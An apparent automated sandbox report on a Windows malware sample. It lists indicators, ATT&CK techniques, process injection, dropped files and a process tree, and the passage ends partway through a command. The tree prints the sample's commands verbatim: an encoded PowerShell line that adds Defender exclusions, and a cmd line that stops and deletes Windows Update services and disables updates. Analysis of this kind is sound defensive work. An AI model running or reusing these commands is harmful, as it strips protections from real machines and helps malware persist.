bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

Analysis

max time kernel
268s
max time network
284s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
29-08-2022 22:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe
Size

5.1MB
MD5

2438b851e157a3f70bd48af1984b2139
SHA1

105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256

bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512

ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
SSDEEP

98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXE

description	pid	process	target process
PID 3316 created 572	3316	powershell.EXE	winlogon.exe
PID 4756 created 4276	4756	svchost.exe	DllHost.exe
PID 4756 created 3668	4756	svchost.exe	DllHost.exe
PID 312 created 572	312	powershell.EXE	winlogon.exe

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 3 IoCs

Processes:

conhost.exeupdate.exedialer.exe

pid process

4824 conhost.exe
584 update.exe
3416 dialer.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2336 takeown.exe
4064 icacls.exe
4324 takeown.exe
3944 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

4064 icacls.exe
4324 takeown.exe
3944 icacls.exe
2336 takeown.exe

pid	process
4824	conhost.exe
584	update.exe
3416	dialer.exe

pid	process
2336	takeown.exe
4064	icacls.exe
4324	takeown.exe
3944	icacls.exe

pid	process
4064	icacls.exe
4324	takeown.exe
3944	icacls.exe
2336	takeown.exe

Drops file in System32 directory 9 IoCs

Processes:

powershell.EXEpowershell.exeOfficeClickToRun.exepowershell.EXEpowershell.execonhost.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\1F40.tmp	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 4 IoCs

Processes:

conhost.exepowershell.EXEpowershell.EXEconhost.exe

description	pid	process	target process
PID 5048 set thread context of 4824	5048	conhost.exe	conhost.exe
PID 3316 set thread context of 4656	3316	powershell.EXE	dllhost.exe
PID 312 set thread context of 1776	312	powershell.EXE	dllhost.exe
PID 1612 set thread context of 3416	1612	conhost.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Platform\Defender\update.exe	conhost.exe
File opened for modification	C:\Program Files\Platform\Defender\update.exe	conhost.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4620 sc.exe
96 sc.exe
772 sc.exe
4388 sc.exe
4516 sc.exe
4424 sc.exe
1268 sc.exe
1972 sc.exe
3916 sc.exe
3988 sc.exe
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

916 4276 WerFault.exe DllHost.exe
4392 3668 WerFault.exe DllHost.exe

pid	process
4620	sc.exe
96	sc.exe
772	sc.exe
4388	sc.exe
4516	sc.exe
4424	sc.exe
1268	sc.exe
1972	sc.exe
3916	sc.exe
3988	sc.exe

pid	pid_target	process	target process
916	4276	WerFault.exe	DllHost.exe
4392	3668	WerFault.exe	DllHost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.exepowershell.exepowershell.EXEOfficeClickToRun.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1661818880"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
4932	reg.exe
3840	reg.exe
1420	reg.exe
4436	reg.exe
4584	reg.exe
3616	reg.exe
2284	reg.exe
1992	reg.exe
3904	reg.exe
4252	reg.exe
4308	reg.exe
1424	reg.exe
4236	reg.exe
4676	reg.exe
1232	reg.exe
2280	reg.exe
4232	reg.exe
3584	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.execonhost.exepowershell.EXEdllhost.exepowershell.EXEWerFault.exeWerFault.exe

pid	process
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
5048	conhost.exe
3316	powershell.EXE
3316	powershell.EXE
3316	powershell.EXE
3316	powershell.EXE
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
312	powershell.EXE
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
4656	dllhost.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
916	WerFault.exe
4392	WerFault.exe
4392	WerFault.exe
4392	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2056 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

620

pid	process
2056	Explorer.EXE

pid	process
620

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeIncreaseQuotaPrivilege	4024	powershell.exe
Token: SeSecurityPrivilege	4024	powershell.exe
Token: SeTakeOwnershipPrivilege	4024	powershell.exe
Token: SeLoadDriverPrivilege	4024	powershell.exe
Token: SeSystemProfilePrivilege	4024	powershell.exe
Token: SeSystemtimePrivilege	4024	powershell.exe
Token: SeProfSingleProcessPrivilege	4024	powershell.exe
Token: SeIncBasePriorityPrivilege	4024	powershell.exe
Token: SeCreatePagefilePrivilege	4024	powershell.exe
Token: SeBackupPrivilege	4024	powershell.exe
Token: SeRestorePrivilege	4024	powershell.exe
Token: SeShutdownPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeSystemEnvironmentPrivilege	4024	powershell.exe
Token: SeRemoteShutdownPrivilege	4024	powershell.exe
Token: SeUndockPrivilege	4024	powershell.exe
Token: SeManageVolumePrivilege	4024	powershell.exe
Token: 33	4024	powershell.exe
Token: 34	4024	powershell.exe
Token: 35	4024	powershell.exe
Token: 36	4024	powershell.exe
Token: SeShutdownPrivilege	3948	powercfg.exe
Token: SeCreatePagefilePrivilege	3948	powercfg.exe
Token: SeShutdownPrivilege	4264	powercfg.exe
Token: SeCreatePagefilePrivilege	4264	powercfg.exe
Token: SeShutdownPrivilege	4044	powercfg.exe
Token: SeCreatePagefilePrivilege	4044	powercfg.exe
Token: SeShutdownPrivilege	4104	powercfg.exe
Token: SeCreatePagefilePrivilege	4104	powercfg.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeTakeOwnershipPrivilege	2336	takeown.exe
Token: SeIncreaseQuotaPrivilege	4480	powershell.exe
Token: SeSecurityPrivilege	4480	powershell.exe
Token: SeTakeOwnershipPrivilege	4480	powershell.exe
Token: SeLoadDriverPrivilege	4480	powershell.exe
Token: SeSystemProfilePrivilege	4480	powershell.exe
Token: SeSystemtimePrivilege	4480	powershell.exe
Token: SeProfSingleProcessPrivilege	4480	powershell.exe
Token: SeIncBasePriorityPrivilege	4480	powershell.exe
Token: SeCreatePagefilePrivilege	4480	powershell.exe
Token: SeBackupPrivilege	4480	powershell.exe
Token: SeRestorePrivilege	4480	powershell.exe
Token: SeShutdownPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeSystemEnvironmentPrivilege	4480	powershell.exe
Token: SeRemoteShutdownPrivilege	4480	powershell.exe
Token: SeUndockPrivilege	4480	powershell.exe
Token: SeManageVolumePrivilege	4480	powershell.exe
Token: 33	4480	powershell.exe
Token: 34	4480	powershell.exe
Token: 35	4480	powershell.exe
Token: 36	4480	powershell.exe
Token: SeIncreaseQuotaPrivilege	4480	powershell.exe
Token: SeSecurityPrivilege	4480	powershell.exe
Token: SeTakeOwnershipPrivilege	4480	powershell.exe
Token: SeLoadDriverPrivilege	4480	powershell.exe
Token: SeSystemProfilePrivilege	4480	powershell.exe
Token: SeSystemtimePrivilege	4480	powershell.exe
Token: SeProfSingleProcessPrivilege	4480	powershell.exe
Token: SeIncBasePriorityPrivilege	4480	powershell.exe
Token: SeCreatePagefilePrivilege	4480	powershell.exe
Token: SeBackupPrivilege	4480	powershell.exe
Token: SeRestorePrivilege	4480	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dwm.exe

pid process

984 dwm.exe
984 dwm.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Conhost.exeConhost.exe

pid process

2732 Conhost.exe
2212 Conhost.exe

pid	process
984	dwm.exe
984	dwm.exe

pid	process
2732	Conhost.exe
2212	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1524 wrote to memory of 5048	1524	bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe	conhost.exe
PID 1524 wrote to memory of 5048	1524	bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe	conhost.exe
PID 1524 wrote to memory of 5048	1524	bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe	conhost.exe
PID 5048 wrote to memory of 4024	5048	conhost.exe	powershell.exe
PID 5048 wrote to memory of 4024	5048	conhost.exe	powershell.exe
PID 5048 wrote to memory of 3992	5048	conhost.exe	cmd.exe
PID 5048 wrote to memory of 3992	5048	conhost.exe	cmd.exe
PID 5048 wrote to memory of 4188	5048	conhost.exe	cmd.exe
PID 5048 wrote to memory of 4188	5048	conhost.exe	cmd.exe
PID 3992 wrote to memory of 1972	3992	cmd.exe	sc.exe
PID 3992 wrote to memory of 1972	3992	cmd.exe	sc.exe
PID 4188 wrote to memory of 3948	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 3948	4188	cmd.exe	powercfg.exe
PID 3992 wrote to memory of 4388	3992	cmd.exe	sc.exe
PID 3992 wrote to memory of 4388	3992	cmd.exe	sc.exe
PID 4188 wrote to memory of 4264	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 4264	4188	cmd.exe	powercfg.exe
PID 5048 wrote to memory of 4480	5048	conhost.exe	powershell.exe
PID 5048 wrote to memory of 4480	5048	conhost.exe	powershell.exe
PID 4188 wrote to memory of 4044	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 4044	4188	cmd.exe	powercfg.exe
PID 3992 wrote to memory of 4516	3992	cmd.exe	sc.exe
PID 3992 wrote to memory of 4516	3992	cmd.exe	sc.exe
PID 3992 wrote to memory of 4424	3992	cmd.exe	sc.exe
PID 3992 wrote to memory of 4424	3992	cmd.exe	sc.exe
PID 4188 wrote to memory of 4104	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 4104	4188	cmd.exe	powercfg.exe
PID 3992 wrote to memory of 4620	3992	cmd.exe	sc.exe
PID 3992 wrote to memory of 4620	3992	cmd.exe	sc.exe
PID 3992 wrote to memory of 4932	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 4932	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 4252	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 4252	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 3840	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 3840	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 4676	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 4676	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 4308	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 4308	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 2336	3992	cmd.exe	takeown.exe
PID 3992 wrote to memory of 2336	3992	cmd.exe	takeown.exe
PID 3992 wrote to memory of 4064	3992	cmd.exe	icacls.exe
PID 3992 wrote to memory of 4064	3992	cmd.exe	icacls.exe
PID 5048 wrote to memory of 4824	5048	conhost.exe	conhost.exe
PID 5048 wrote to memory of 4824	5048	conhost.exe	conhost.exe
PID 5048 wrote to memory of 4824	5048	conhost.exe	conhost.exe
PID 5048 wrote to memory of 1896	5048	conhost.exe	cmd.exe
PID 5048 wrote to memory of 1896	5048	conhost.exe	cmd.exe
PID 5048 wrote to memory of 772	5048	conhost.exe	cmd.exe
PID 5048 wrote to memory of 772	5048	conhost.exe	cmd.exe
PID 3992 wrote to memory of 1424	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 1424	3992	cmd.exe	reg.exe
PID 1896 wrote to memory of 1412	1896	cmd.exe	schtasks.exe
PID 1896 wrote to memory of 1412	1896	cmd.exe	schtasks.exe
PID 3992 wrote to memory of 1420	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 1420	3992	cmd.exe	reg.exe
PID 772 wrote to memory of 1240	772	cmd.exe	choice.exe
PID 772 wrote to memory of 1240	772	cmd.exe	choice.exe
PID 3992 wrote to memory of 1232	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 1232	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 2284	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 2284	3992	cmd.exe	reg.exe
PID 3992 wrote to memory of 3160	3992	cmd.exe	schtasks.exe
PID 3992 wrote to memory of 3160	3992	cmd.exe	schtasks.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:628

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:572

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:984

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{66417ed9-66e7-4652-934c-58071ffb5d02}
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4656

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{3c0e4cb6-dd4b-4fbe-a57a-351fe57faabb}
2⤵
PID:1776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:996

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:952

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2856

C:\Program Files\Platform\Defender\update.exe
"C:\Program Files\Platform\Defender\update.exe"
2⤵
- Executes dropped EXE
PID:584

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"
3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN 